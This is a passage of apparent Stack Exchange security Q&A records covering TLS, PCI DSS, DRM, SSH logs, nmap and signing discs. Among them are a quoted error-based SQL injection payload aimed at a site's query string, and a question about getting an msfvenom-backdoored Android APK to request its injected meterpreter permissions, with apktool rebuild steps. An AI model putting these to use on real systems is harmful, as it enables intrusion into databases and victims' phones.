I hope you understand what I mean. I realize it might be a non-issue, because in the end all they can do is read data that they could read anyway by just going to the ""intended"" front-end site. But at the moment I can use AJAX from any computer/server to fetch the JSON data, and that is basically what I want to prevent, so that the only way to view the data is through its ""intended source/design"" (i.e. via the front-end).

+ +

Basically an API for public content delivery but only allowing my server to access and display it.
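For reference, the firewall-based idea I have in mind looks roughly like this, assuming nginx reverse-proxies to the back-end on the same host (ufw normally allows loopback traffic, so the proxy still reaches port 8080 locally):

# block outside access to the back-end port
sudo ufw deny 8080/tcp
sudo ufw status verbose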

+",224709,,224709,,1/9/2020 11:28,1/9/2020 12:07,Protect public(?) API endpoints,,1,0,1,,,CC BY-SA 4.0 +223905,1,223909,,1/9/2020 11:38,,0,287,"

A strict interpretation of that rule would seem to prohibit any non-payment related web browsing by PCs that are used to transmit card details to a payment processor, and perhaps also prohibit web browsing by any PCs on the same LAN as a card processing PC.

+ +

However, it appears that rule has been interpreted by others more broadly.

+ +
+

In requirement 1.2, we are ensuring that the firewall configuration is + designed to be least allowed – allowing the least number of ports + necessary for business to occur. This does not require you to drop + everything, you must justify each port required and implement only + those required to do business. An untrusted network is one which your + firm does not control, such as the Internet or a partner network.

+
+ +

source

+ +
+

Specific to PCI DSS 1.2.1, it says that your organization is only + allowed to use the protocols, ports, and services that are required + for the operation of your business.

+
+ +

source

+ +

Can anyone provide confirmation or clarification?

+",136292,,6253,,1/9/2020 12:28,1/9/2020 12:40,PCI DSS 1.2.1 Restrict inbound and outbound traffic to that which is necessary for the cardholder data environment,,1,0,,,,CC BY-SA 4.0 +223908,1,,,1/9/2020 12:21,,1,169,"

After reading JSON Web Encryption (JWE) and making a Node JS JWE POC demonstrating key mode using Key Encryption. I'm a bit confused as to how to validate that the sender of the message was in fact, the actual sender (not a man-in-the-middle with access to the public key).

+

With PGP, public keys are exchanged, and the message is validated against the digital signature. Is it possible to do the same with the JWS and JWE specs? I had a feeling this would somehow be done in the AAD, but that doesn't appear to be the case, as the AAD is computed for the purpose of the Auth Tag. Obviously the public keys would have to be exchanged for this to work.

+",224693,,-1,,10/7/2021 8:14,1/28/2022 20:04,Public Digital Signature Validation with JWE,,1,0,,,,CC BY-SA 4.0 +223915,1,223917,,1/9/2020 14:18,,3,335,"

From an information security aspect, is there a difference between saying ""read-only"" or ""write-protected"" storage/memory?

+ +

Is there a chance that a read-only memory would not be write-protected at the same time?

+ +

In addition, are OTP (One-Time-Programmable) memories better described as write-protected memories or as read-only memories?

+",190661,,6253,,1/9/2020 14:58,1/9/2020 15:00,Read-only vs. Write-protected,,1,0,,,,CC BY-SA 4.0 +223916,1,223918,,1/9/2020 14:24,,3,181,"

There is a website which I want to register for but it is a internship/job-seeking website and thus on registration some VERY sensitive data is required.

+ +

When registering Firefox alerted me that the site was only HTTP, so I tried prefixing https:// and the page doesn't exist. I contacted the site administrator to ask them and they said:

+ +
+

appropriate security measures have been provided to guarantee the personal data security. As for the SSL certificate (recommended by the GDPR), we will provide with this one as soon as possible.

+
+ +

I know very little about security, so I am hoping someone could tell me whether what they are saying holds water and whether it could be a secure site that has yet to use an SSL certificate (it seems unlikely if they are only using HTTP)

+ +

If the statement doesn't hold water, and the administrator agrees to it, is there a way that I can package and send the data to them securely by alternative means?
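One alternative I was considering, if the administrator agrees: encrypt the registration details to a public key they provide and send the result over ordinary email (the key file and address below are placeholders):

gpg --import admin_pubkey.asc
gpg --encrypt --armor -r admin@example.org registration_details.txt
# produces registration_details.txt.asc, which only the key holder can decrypt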

+",224728,,149676,,1/9/2020 14:47,1/9/2020 15:35,A workaround for external website's HTTP registration page,,1,7,,,,CC BY-SA 4.0 +223919,1,,,1/9/2020 15:20,,1,39,"

I remember a security measure I've seen on a few sites in the past against phishing, but I don't know what it's called. When the user logs in, or just inputs their username, the site shows some kind of secret word / phrase / drawing. That word / phrase / drawing is something the user always sees, so it's proof for them that they're talking to the real site.

+ +

I know that American Express uses it, and I've seen a few other sites in the past use it too.

+ +

Does anyone know what it's called?

+",16116,,6253,,1/9/2020 15:24,1/9/2020 15:24,Name of security measure that shows user a personal word / phrase / drawing,,0,3,,1/9/2020 19:14,,CC BY-SA 4.0 +223923,1,,,1/9/2020 16:02,,0,298,"

I am using msfvenom to backdoor an Android apk. It is supposed that msfvenom adds extra permissions to original AndroidManifest:

+ +
[*] Poisoning the manifest with meterpreter permissions..
+[*] Adding <uses-permission android:name=""android.permission.READ_CONTACTS""/>
+[*] Adding <uses-permission android:name=""android.permission.CHANGE_WIFI_STATE""/>
+[*] Adding <uses-permission android:name=""android.permission.CALL_PHONE""/>
+[*] Adding <uses-permission android:name=""android.permission.RECORD_AUDIO""/>
+...
+
+ +

When I install the app in the Android phone, it just asks to allow default app permissions and not the injected ones.

+ +

Does anyone know how I can edit the original APK to request these permissions, or how else I can solve this?
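What I was planning to try is to decompile the APK, inspect or edit the manifest by hand, and rebuild it (the paths and keystore name below are placeholders). I also suspect that on Android 6+ the 'dangerous' permissions are requested at runtime rather than at install time, which might explain what I am seeing:

apktool d backdoored.apk -o decoded/
# inspect or edit decoded/AndroidManifest.xml, then rebuild and re-sign
apktool b decoded/ -o rebuilt.apk
jarsigner -keystore my.keystore rebuilt.apk myalias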

+ +

Thank you in advance.

+",142487,,,,,1/9/2020 16:02,msfvenom: backdoored apk,,0,2,,,,CC BY-SA 4.0 +223924,1,223930,,1/9/2020 16:28,,2,551,"

I am having trouble understanding the point of EAP.

+ +

EAP is an authentication framework, which defines several TLS based methods and encapsulations like EAP-TLS, EAP-TTLS and PEAP. These all require the server/authenticator to have a certificate (EAP-TLS require the client/supplicant to have it too).

+ +
  • TLS provides authentication with the use of certificates on its own. Then what is the point of EAP?
  • Is EAP better in some way?
  • The most notable usage of EAP is WPA. Is it advantageous to use it on wired connections too compared to plain TLS?
  • When would you rather use one or the other?
+",221056,,,,,1/9/2020 22:23,EAP vs TLS authentication,,2,0,1,,,CC BY-SA 4.0 +223925,1,223973,,1/9/2020 16:30,,3,3004,"

In some Java code that I'm reading, I stumbled over the following encryption algorithms passed to the Cipher.getInstance(...) method:

+ +
  • AES/CBC/PKCS5Padding
  • DESede/ECB/PKCS5Padding
  • RSA/ECB/PKCS1Padding
+ +

Note: In the Java model, the first substring represents the cipher, the second the mode of operation, and the third the padding scheme.

+ +

Now, I believe that ECB is generally insecure (independently of the used cipher / padding scheme), because it preserves the structure of the plaintext.
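For example, the structure preservation is easy to see with openssl (the hex key and IV below are throwaway values): with ECB, four identical plaintext blocks produce four identical ciphertext blocks, whereas with CBC they all differ.

head -c 64 /dev/zero | openssl enc -aes-128-ecb -K 00112233445566778899aabbccddeeff -nopad | xxd
head -c 64 /dev/zero | openssl enc -aes-128-cbc -K 00112233445566778899aabbccddeeff -iv 000102030405060708090a0b0c0d0e0f -nopad | xxd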

+ +

In addition, I also read that CBC can be insecure, depending on the implementation. More precisely, if the implementation is written in such a way that it is revealed whether some given ciphertext was correctly padded or not, then this can be exploited to decrypt encrypted messages. In the case of Java, the problem is that different platforms / Java implementations / crypto providers are available, so it's hard to tell in general whether using CBC as a mode of operation is fine.

+ +

That leads me to think that all three of the above algorithms are potentially insecure. But perhaps I'm overestimating the problems of ECB / CBC, and they can be used in a secure way?

+ +

Hence the question: Can/Should the above algorithms be considered as secure or not, and why?

+ +

Update: To provide some more context, the code I'm referring to is the OWASP Benchmark. This benchmark consists of thousands of test cases, some of which intentionally contain actual vulnerabilities, while others intentionally contain ""fake"" vulnerabilities (i.e., code that looks like it might be vulnerable but actually isn't). Some of the test cases labeled as ""fake vulnerabilities"" encrypt some text using one of the three algorithms mentioned above. Since OWASP considers these as ""fake vulnerabilities"", that implies that OWASP considers these algorithms as safe, which surprised me. I'm wondering whether OWASP is right in considering these algorithms as safe, or whether these test cases in the OWASP Benchmark really ought to be labeled as ""actual vulnerabilities"" rather than ""fake vulnerabilities"".

+ +

An example of such a ""fake vulnerability"" test case in the OWASP Benchmark is the test case 54, which encrypts some data using AES/CBC/PKCS5Padding, but is labeled as not being vulnerable to CWE 327: Use of a Broken or Risky Cryptographic Algorithm.

+",184963,,184963,,1/10/2020 10:41,2/12/2022 22:38,Are ECB and CBC modes of operation generally insecure?,,2,3,,,,CC BY-SA 4.0 +223929,1,,,1/9/2020 17:13,,19,3146,"

I am trying to understand how DRM works under the hood. There doesn't seem to be much information about it on the web so I figured I would ask here.

+ +

After some attempted research, I found it extremely difficult to find any information regarding how Widevine or FairPlay DRM actually works. There is some general information about Content Decryption Module (CDMs) and such but how it actually works seems to be a mystery. I am wondering if this is intentional because much of DRM is maybe security through obscurity.

+ +

My basic/abstract understanding of DRM is that a file is encrypted usually using AES. When the file is attempted to be accessed by the DRM solution a key is transferred from a server to the CDM for it to be decrypted using some proprietary method (this is the part I am looking to understand better). The decrypted content is then given back to the application, often a browser, for playback. Is this correct?

+ +

If the above is the case, I assume that an attacker could simply edit the binary for the CDM to access the key or the file after is decrypted.

+",163099,,163099,,1/9/2020 17:24,1/13/2020 11:51,"How does Widevine, FairPlay, and other DRM's work under the hood?",,3,3,6,,,CC BY-SA 4.0 +223931,1,223932,,1/9/2020 17:44,,0,5554,"

I have a c program that gets the router IP and netmask and puts it into a text file in the format of 192.168.1.1/24. When I issue the nmap scan command with the target text file I get the unable to split netmask from target expression error.

+ +

This should work... issuing the nmap command with the ip/mask specified rather than reading from file works obviously. Issuing a different nmap command when reading from file with just the ip address in works as well. Only when the /24 is on the end of the address does the error occur.

+ +

Is this down to a fundamental flaw in the nmap file reader or is there a way around this?

+ +

I am issuing the commands with the popen function in C

+ +
scan = popen(""nmap -sn /tmp/file.txt"", ""r"");
+
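For reference, the workaround I am considering is to pass the file via nmap's -iL option instead of as a bare target; a bare path appears to get parsed as a host/netmask expression, which would explain the error. CIDR entries such as 192.168.1.1/24 are accepted inside the file:

# in the C program the popen string would simply become this command
nmap -sn -iL /tmp/file.txt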
+",224741,,6253,,1/9/2020 19:11,1/9/2020 19:12,nmap - how can I input a target to nmap from a file with the netmask attached?,,1,1,,,,CC BY-SA 4.0 +223933,1,223940,,1/9/2020 19:05,,1,170,"

openssl ciphers -v 'ECDH+AESGCM:DH+AESCGM' gives:

+ +
ECDHE-RSA-AES256-GCM-SHA384 TLSv1.2 Kx=ECDH     Au=RSA  Enc=AESGCM(256) Mac=AEAD
+ECDHE-ECDSA-AES256-GCM-SHA384 TLSv1.2 Kx=ECDH     Au=ECDSA Enc=AESGCM(256) Mac=AEAD
+ECDH-RSA-AES256-GCM-SHA384 TLSv1.2 Kx=ECDH/RSA Au=ECDH Enc=AESGCM(256) Mac=AEAD
+ECDH-ECDSA-AES256-GCM-SHA384 TLSv1.2 Kx=ECDH/ECDSA Au=ECDH Enc=AESGCM(256) Mac=AEAD
+ECDHE-RSA-AES128-GCM-SHA256 TLSv1.2 Kx=ECDH     Au=RSA  Enc=AESGCM(128) Mac=AEAD
+ECDHE-ECDSA-AES128-GCM-SHA256 TLSv1.2 Kx=ECDH     Au=ECDSA Enc=AESGCM(128) Mac=AEAD
+ECDH-RSA-AES128-GCM-SHA256 TLSv1.2 Kx=ECDH/RSA Au=ECDH Enc=AESGCM(128) Mac=AEAD
+ECDH-ECDSA-AES128-GCM-SHA256 TLSv1.2 Kx=ECDH/ECDSA Au=ECDH Enc=AESGCM(128) Mac=AEAD
+
+ +

whereas openssl ciphers -v 'DH+AESGCM:ECDH+AESGCM' gives

+ +
DH-DSS-AES256-GCM-SHA384 TLSv1.2 Kx=DH/DSS   Au=DH   Enc=AESGCM(256) Mac=AEAD
+DHE-DSS-AES256-GCM-SHA384 TLSv1.2 Kx=DH       Au=DSS  Enc=AESGCM(256) Mac=AEAD
+DH-RSA-AES256-GCM-SHA384 TLSv1.2 Kx=DH/RSA   Au=DH   Enc=AESGCM(256) Mac=AEAD
+DHE-RSA-AES256-GCM-SHA384 TLSv1.2 Kx=DH       Au=RSA  Enc=AESGCM(256) Mac=AEAD
+ADH-AES256-GCM-SHA384   TLSv1.2 Kx=DH       Au=None Enc=AESGCM(256) Mac=AEAD
+DH-DSS-AES128-GCM-SHA256 TLSv1.2 Kx=DH/DSS   Au=DH   Enc=AESGCM(128) Mac=AEAD
+DHE-DSS-AES128-GCM-SHA256 TLSv1.2 Kx=DH       Au=DSS  Enc=AESGCM(128) Mac=AEAD
+DH-RSA-AES128-GCM-SHA256 TLSv1.2 Kx=DH/RSA   Au=DH   Enc=AESGCM(128) Mac=AEAD
+DHE-RSA-AES128-GCM-SHA256 TLSv1.2 Kx=DH       Au=RSA  Enc=AESGCM(128) Mac=AEAD
+ADH-AES128-GCM-SHA256   TLSv1.2 Kx=DH       Au=None Enc=AESGCM(128) Mac=AEAD
+ECDHE-RSA-AES256-GCM-SHA384 TLSv1.2 Kx=ECDH     Au=RSA  Enc=AESGCM(256) Mac=AEAD
+ECDHE-ECDSA-AES256-GCM-SHA384 TLSv1.2 Kx=ECDH     Au=ECDSA Enc=AESGCM(256) Mac=AEAD
+ECDH-RSA-AES256-GCM-SHA384 TLSv1.2 Kx=ECDH/RSA Au=ECDH Enc=AESGCM(256) Mac=AEAD
+ECDH-ECDSA-AES256-GCM-SHA384 TLSv1.2 Kx=ECDH/ECDSA Au=ECDH Enc=AESGCM(256) Mac=AEAD
+ECDHE-RSA-AES128-GCM-SHA256 TLSv1.2 Kx=ECDH     Au=RSA  Enc=AESGCM(128) Mac=AEAD
+ECDHE-ECDSA-AES128-GCM-SHA256 TLSv1.2 Kx=ECDH     Au=ECDSA Enc=AESGCM(128) Mac=AEAD
+ECDH-RSA-AES128-GCM-SHA256 TLSv1.2 Kx=ECDH/RSA Au=ECDH Enc=AESGCM(128) Mac=AEAD
+ECDH-ECDSA-AES128-GCM-SHA256 TLSv1.2 Kx=ECDH/ECDSA Au=ECDH Enc=AESGCM(128) Mac=AEAD
+
+ +

Indeed, using the former will make SSLLabs not ""find"" for example the cipher suite ""TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 (0x9f)"". It does however work with the latter, four cipher suites in total are found:

+ +
TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 (0x9f)   DH 2048 bits   FS  256
+TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 (0x9e)   DH 2048 bits   FS  128
+TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (0xc030)   ECDH secp256r1 (eq. 3072 bits RSA)   FS    256
+TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (0xc02f)   ECDH secp256r1 (eq. 3072 bits RSA)   FS    128
+
+ +

However it seems that in that case the more unsecure ciphers are listed/used first.

+ +

How can this be explained?

+",13835,,,,,1/9/2020 21:31,"Why are the following two sets of ciphers ""different""?",,1,0,,,,CC BY-SA 4.0 +223934,1,223936,,1/9/2020 19:20,,1,370,"

I'm a cyber security student and don't do server administration on a regular basis. I was wondering how to check SSH login logs and found that they can be checked with sudo cat /var/log/auth.log. When I checked on my server there were lots of entries like Failed password for root from [IP]. This is a newly installed remote server; there's no way I could have logged in that many times.

+ +

Then I read it carefully: it says Failed password for root from [IP]. Wait, it's for root? I have created my own separate user account, and except for the first time when I had to create that new user account, I have never touched the root user. It seems to me someone is trying his luck by brute-forcing credentials. Still, I wanted to ask my seniors here what they think.

+ +

I've nothing running on this server not even apache, nginx etc. Only SSH port is open and AFAIK there's no recent SSH vulnerability in public knowledge.

+ +

And one more important thing I wanted to ask is, being a security student this really grabs my attention and makes me more curious to understand about this. Why would someone run scripts to bruteforce and scan new servers? I mean what would he get, there's barely anything in my case. Initially, I thought maybe he wants to spread malware using my server but if someone has the resources to scan the entire internet he surely has resources to do that himself. Maybe he just want to add servers into his list of compromised servers and use all of them together as a botnet, so many thing going on my mind. What would he do with a new server?

+ +

EDIT: Something I realized today: as a security student I was looking at things from the offensive side. Now that I have set up my own server, I really understand the need to know the defensive side as well as a pentester. If any student is reading this, I would say: learn the defensive side too. I will do the same from now on.
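For anyone else in the same spot, the hardening I am applying is roughly the following (key-based login must already work or you will lock yourself out; the service may be named ssh or sshd depending on the distribution, and something like fail2ban can throttle the brute-force attempts):

# in /etc/ssh/sshd_config:
#   PermitRootLogin no
#   PasswordAuthentication no
# then validate the configuration and reload the daemon
sudo sshd -t && sudo systemctl reload sshd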

+",224747,,,,,1/17/2020 7:29,Is someone trying to hack into my server?,,1,3,1,,,CC BY-SA 4.0 +223935,1,,,1/9/2020 19:30,,2,377,"

I want to do something similar to Ubuntu's signed checksums in distribution and I'm currently stuck on the integrity part. The tutorial here covers most of what I'd like the process to look like (I've modified what I'm writing for Mac syntax since that's what I'm using): https://tutorials.ubuntu.com/tutorial/tutorial-how-to-verify-ubuntu

+ +

Unfortunately the distribution channel I'm using requires that the files are distributed unpacked; otherwise I would have just zipped them up into a tar file or whatever and performed checksums on that.

+ +

It's simple enough to generate the SHA256SUMS file for the files present: find * -type f -exec shasum -b -a 256 {} \; > SHA256SUMS (just would have to remove the sums of the sums files), and then the sums can be verified with shasum -c -a 256 SHA256SUMS

+ +

My concern is that this system only guarantees integrity of files that were present when the sums were generated; an attacker could add additional files and this system would not catch that.

+ +

Staying in-band, one option I thought of is to have the recipient run the same command to generate the sums in a new file and then run diff between the one they generated and the one I generated, but I fear some people might just run the typical verification command. If instead I included a script to run verification, any attacker would just change this script as well, and it also runs the risk of people ignoring the script and running the typical verification strategy.
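To make the regenerate-and-compare idea concrete, this is roughly what I would ask recipients to run (it also flags files added after the manifest was signed); the file names match the commands above:

# rebuild the manifest locally, excluding the manifest/signature files themselves
find * -type f ! -name 'SHA256SUMS*' -exec shasum -b -a 256 {} \; | sort > SHA256SUMS.local
sort SHA256SUMS > SHA256SUMS.sorted
# any added, removed or modified file shows up here
diff SHA256SUMS.sorted SHA256SUMS.local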

+ +

It's seeming the best option so far is to have another distribution channel where things are tarred up, have a signed checksum for that file, and then to finish verification you would check the diff between the two file trees. Any other ideas?

+",224744,,,,,1/10/2020 3:05,How to ensure authenticity and integrity of a directory,,1,0,,,,CC BY-SA 4.0 +223939,1,,,1/9/2020 19:56,,1,273,"

I know Nmap has nmap-services file which gives us the list of top 1000 ports/services found on the Internet. But this list seems to be outdated, as the Nmap top 1000 list doesn't include several services used now-a-days (like 27017/mongoDB, 6379/redis, 11211/memcached, etc). Is there any source other than Nmap, which can provide the updated list of top 1000 common ports/services used in the Internet?

+",223262,,,,,1/9/2020 19:56,Is there an updated (non-Nmap) top 100 or top 1000 common ports list?,,0,3,,,,CC BY-SA 4.0 +223941,1,223943,,1/9/2020 21:56,,1,335,"

I have a wildcard valid certificate signed by Certificate Authority. Is it possible to test the https locally from the server without a registered DNS?

+ +

My idea is to bind the domain name with 127.0.0.1 in /etc/hosts.

+ +

The HTML is running on Nginx container and I am using centos 7.

+ +

Is it possible to make an SSL handshake with curl https://<dnsname>.<name>.com:443, or does it need to be a publicly registered DNS name?

+ +

Note: ICMP is disabled but the server is connected to internet
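For completeness, these are the checks I have in mind (the host name is a placeholder for the real name covered by the wildcard certificate):

# pin the name to 127.0.0.1 for this one request, no /etc/hosts edit needed
curl -v --resolve app.example.com:443:127.0.0.1 https://app.example.com/
# or inspect the handshake directly while sending the matching SNI
openssl s_client -connect 127.0.0.1:443 -servername app.example.com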

+",224755,,224755,,1/9/2020 22:26,1/9/2020 22:26,Can I test ssl connection locally with a valid certificate (CA) with local dns?,,1,3,1,,,CC BY-SA 4.0 +223942,1,223946,,1/9/2020 22:01,,2,2609,"

Hacker is trying to attack the site by using the following SQL injection query to get the SQL version.

+ +

Using URL site. example:

+ +
www.abc.com/?queryParamString=(SELECT 9701 FROM(SELECT COUNT(*),CONCAT(0x71787a7171,(SELECT (ELT(9701=9701,1))),0x71767a6271,FLOOR(RAND(0)*2))X FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY X)a)
+
+ +

In my application I am using prepared statements, so queryParamString goes into the DB as plain text without any side effects.

+ +

My question:

+ +
  • Are there any best practices to sanitize the URL when the PHP server receives a request to render the page?
  • Or any client-side practices?
  • Any pointers on how to prevent, or how you would deal with, this kind of attack?
+",224754,,224754,,1/9/2020 22:08,1/10/2020 8:40,SQL injection using URL query string (web application/php server),,2,4,1,,,CC BY-SA 4.0 +223945,1,223949,,1/9/2020 23:24,,4,1655,"

There are recommendations on this website and on the internet suggesting to never store credentials (e.g. the login/password to the database that a certain web application is using, or an S3 access key on a non-AWS instance, etc.) in plain text on the filesystem, apparently due to the possibility of recovering the password from the disk.

+ +

The alternatives suggest transmitting secrets from some sort of remote secret manager over the network; I believe this model expects the application that makes use of the corresponding secret to store it in memory. Variations of this scheme also support storing secrets in encrypted files on the target host's filesystem and transmitting the encryption key to the application in some secure way over the network.

+ +

Given that I'd still like to store credentials unencrypted on the local filesystem - let's say due to framework limitation that expects unencrypted password in some local file - would it be possible to still store secrets in plain text in certain file and mitigate the risk by:

+ +
  1. Using an encrypted filesystem - so a malicious actor who steals the disk still won't be able to read secrets on the encrypted partition.
  2. Using a RAM FS (let's forget about the necessity to transmit secrets first for now).
  3. In addition to either 1 or 2, limiting access to the file to the specific user that runs the application (see the sketch after this list).
+ +
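For point 3 in the list above, what I have in mind is roughly the following (the user and path are placeholders):

# credentials file readable only by the dedicated account that runs the app
sudo chown appsvc:appsvc /etc/myapp/db_credentials
sudo chmod 0400 /etc/myapp/db_credentials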

P.S. there are similar questions about this matter, e.g. Storing database password in plain text? (this one is perhaps too vague and therefore it did not receiving a clear answer) and Is it okay for API secret to be stored in plain text or decrypt-able? (more broad in scope; the answers though didn't address particular aspect I'm asking about).

+ +

In addition, I want to clarify that (1) password IS NOT stored in the application configuration, let's just say it is distributed via some secure mechanism to the host during application's deployment; (2) end user who uses web application I'm referring to does not have access to the host.

+ +

My primary question is whether there is something inherently insecure in filesystems that essentially leaves me with options that expect me to never store credentials (for accessing other services from my applications) unencrypted on any filesystem. In order to narrow down the scope, let's limit this question to modern Linux OS.

+",224760,,,,,1/10/2020 1:38,Is there something insecure about storing secrets in plain text on the host FS?,,2,5,3,,,CC BY-SA 4.0 +223950,1,,,1/10/2020 2:14,,1,104,"

Perhaps this is off-topic or too broad to answer but I'm thinking that there must be solutions.

+ +

Some countries are talking about unplugging from the internet and creating their own isolated domestic internet. Russia, recently, ran their own tests about doing this and it has seemed successful.

+ +

How could this, essentially, large LAN network be circumvented?

+",80315,,80315,,1/10/2020 2:29,1/10/2020 6:13,How to circumvent an isolated domestic internet connection?,,1,2,,,,CC BY-SA 4.0 +223958,1,,,1/10/2020 6:21,,0,147,"

In TLS 1.3, handshake messages after Hello and KeyShare--e.g., certificates, signature, finished--are encrypted using an AEAD cipher. Can someone explain what the rationale is? Is it mainly for privacy or integrity, or both?

+ +

It doesn't seem to be for integrity because the Finished message should already do that. If it were there for privacy, though, the benefit seems limited. Server identity can still be leaked by other means such as server_name or SNI extension sent by a client. Did I miss something?

+",43979,,,,,1/10/2020 6:31,TLS handshake encryption,,1,0,,,,CC BY-SA 4.0 +223964,1,,,1/10/2020 7:17,,3,83088,"

I have a personal phone which I use at work, and connect to the WiFi at work. I also brought my personal laptop to work a couple times and connected to the WiFi.

+ +

My question is can my employer see my browsing history from when I was connected to my WiFi at home?

+",224782,,,,,11/19/2021 21:41,Can my employer see my browsing history from my home?,,3,2,,,,CC BY-SA 4.0 +223976,1,223978,,1/10/2020 11:45,,-5,155,"

Cognitive hacking some say is a new type of hacking field and some say it is something that been there for many years. Exploring the chapters of WIKI and using projects like MisinfoSec, got me confused about the differences between disinformation and misinformation when it relates to deepfakes and fake news.

+ +

""Misinformation is misleading. Disinformation is a damn lie."" that is the best one-liner I found explaining the difference. It is very confusing when I find these words used interchangeably while having a very different meaning when related to deepfakes and fakenews. Will you consider Deepfakes and fakenews as disinformation or misinformation hacks?

+",188315,,98538,,1/17/2020 11:23,1/17/2020 11:23,Should we consider Deepfakes and fakenews as disinformation or misinformation?,,1,9,1,1/10/2020 13:49,,CC BY-SA 4.0 +223977,1,,,1/10/2020 12:21,,0,300,"

Is there a way to protect sensitive data which is in RAM? Our setup is a microcontroller with no hardware support for security. When there is a need to encrypt data, the secret key exists in RAM. Even further, the plaintext exists in RAM. So if anyone can get access to RAM (e.g. via JTAG), then the sensitive data is in danger?

+",224797,,,,,1/10/2020 14:43,Protect sensitive data in memory,,1,1,,,,CC BY-SA 4.0 +223980,1,223981,,1/10/2020 14:15,,0,110,"

I am currently working on exploiting a potential DOM-based XSS on a web app. So far all of my XSS attempts have been thwarted by Internet Explorer's XSS auditor, even after disabling it. While investigating, I noticed that the query parameter was producing odd results if I replace the ""="" with ""[ ]"", which are reflected in the web app.

+ +

Example site: www.example.com/search/?q=apples

+ +
 Output: expected
+
+ +

Removing the ""="": www.example.com/search/?q[1]

+ +
 Output: {""1""=>nil}
+
+ +

The {""1""=>nil} reflects in the website, so the URL is being interpreted with odd results in the website.

+ +

Another example: www.example.com/search/?q[Object.prototype.foo][cool]=chill

+ +

Output: {""Object.prototype.foo""=>""chill""} permitted: true>}

+ +

From my understanding, the above is Ruby. Could this be exploited with the DOM based XSS?

+ +

Currently the vulnerable libraries the web app is using are: jQuery v1.12.4, React v0.13.3, React (Fast path) v0.13.3, and Moment.js v2.13.0.

+ +

Any help would be greatly appreciated.

+",221249,,,,,1/10/2020 14:41,Potential DOM Based XSS?,,1,0,,,,CC BY-SA 4.0 +223983,1,224137,,1/10/2020 15:08,,2,114,"

In an application I was assessing, I found an interesting piece of code that took my attacker-supplied input and put it into the bindDN while preparing to connect to an LDAP server.

+ +
[USERNAME]@domain.com
+
+ +

Specifically, I can inject whatever I want into the [USERNAME] in the above sample bindDN, including something like testusername@anotherdomain.com@domain.com. I do not control the LDAP URL though. Is there anything risky security-wise with this small bug?

+",128399,,,,,1/13/2020 18:43,Partially controlling LDAP BindDN parameter,,1,1,,,,CC BY-SA 4.0 +223985,1,,,1/10/2020 15:10,,-4,974,"

Aside from possible implementation bugs, which VPN concept aims to offer more protection by design?

+ +
  • SSL VPN (implementation example - OpenVPN)
  • L2TP/IPSEC (implementation example - Strong Swan)
+ +

After reading this review, I can't understand how to compare designed security levels of both beyond what the author says. That is, I'm looking for a summary assessing and comparing these designs in more technical deepness from information security point of view.

+ +

I've created a Meta post about how can I improve this question.

+",150500,,150500,,1/12/2020 12:28,1/12/2020 12:28,"Which VPN offers more security conceptually, SSL VPN or L2TP/IPSEC?",,1,1,,,,CC BY-SA 4.0 +223987,1,,,1/10/2020 15:48,,0,161,"

From a DLP perspective, does anyone know which DLP controls can block or monitor this Logitech Flow feature?

+",198360,,3365,,1/10/2020 15:53,1/10/2020 16:23,“Flow” between computers (Logitech mouse) DLP,,1,0,,,,CC BY-SA 4.0 +223989,1,224004,,1/10/2020 15:53,,1,228,"

I work on a project where DVDs with configuration files and software updates are delivered periodically to end users, and our software loads those discs. For example, we might load a disc with an updated set of hostnames and IP addresses when the network topology is updated, or we might get a disc with virus definition updates.

+ +

Is there any way to sign those discs with GPG or similar such that they could be verified in an offline environment? The systems in question don't have Internet access. Ideally I would like to embed the GPG signature on the discs so they can be self-verifying.

+ +

When I look at how this is typically handled, folks like Debian and Ubuntu will provide a GPG signature alongside their ISO. It's not in the ISO; it's a separate detached file. That doesn't work for us since we deliver physical discs, not ISOs.

+ +
  • Currently we sign individual files on the DVDs. It works, but it's not ideal on a DVD with tens or hundreds of files.
  • My understanding is that embedded signatures only work with file formats that are designed for them, such as RPM. ISOs don't have such a mechanism. Is that correct?
  • I suppose we could tar up the contents of the DVDs and store a tarball and signature on the discs instead. Is that the best answer? Any better ideas?
+ +

I'm open to non-GPG-based solutions. If there's a way to embed a SHA-2 checksum, for instance, that could also work.
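To make the tar option from the list above concrete, this is roughly what I had in mind (file names are placeholders); the offline systems would only need the signing public key imported in advance:

tar -cf payload.tar payload/
gpg --armor --detach-sign payload.tar      # writes payload.tar.asc
# both files go on the disc; verification on the offline system:
gpg --verify payload.tar.asc payload.tar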

+",16974,,,,,1/10/2020 20:42,Is it possible to sign a DVD?,,1,2,,,,CC BY-SA 4.0 +223991,1,,,1/10/2020 15:59,,5,1715,"

There are a number of US Department of Defense (DoD) websites that I need to access on a regular basis (e.g., https://ataaps.csd.disa.mil/ and https://web.mail.mil) that Firefox issues a Warning: Potential Security Risk Ahead with error code SEC_ERROR_UNKNOWN_ISSUER. Looking a little further, it says ""Peer’s Certificate issuer is not recognized.""

+ +

There seem to be some obvious reasons why the DoD would want to issue its own certificates (cf. Why would an organization like the DoD prefer to use its own Root Certificate(s)?) including that this way they are in charge of the security and not someone else and the cost is small since they need certificates for other things.

+ +

My question is from the opposite end and is NOT why does the DoD issue their own certificates, but rather why Firefox does not trust certificates for US government sites by default?

+ +

The more practical question is this: since adding exceptions for all sites whenever they are encountered, without even a cursory glance, seems like bad practice, is there a way to globally add an additional certificate authority (CA) so that Firefox recognizes the US DoD (or whoever is the problem) as a certificate issuer? Does this have drawbacks and open my machine up to additional attacks?
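One option that looks relevant is NSS's certutil (package libnss3-tools on Debian/Ubuntu), which can add a CA to a specific Firefox profile's trust database; this assumes the relevant DoD root certificate has been obtained, and the nickname, file name and profile path below are placeholders:

certutil -A -n 'DoD Root CA' -t 'C,,' -i dod_root_ca.pem \
         -d sql:$HOME/.mozilla/firefox/xxxxxxxx.default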

+",16618,,6253,,1/11/2020 14:45,1/21/2022 17:49,Why are many US Department of Defense certificates not trusted by Firefox?,,5,8,2,,,CC BY-SA 4.0 +223996,1,,,1/10/2020 16:45,,0,1174,"

There are many pre-made tools around for brute-forcing RDP credentials, but I haven't found one for username enumeration. Is it possible by design to enumerate potential RDP logins? If not within the standard of the protocol, are there username enumeration vulnerabilities like the CVE-2018-15473 for certain OpenSSH versions?

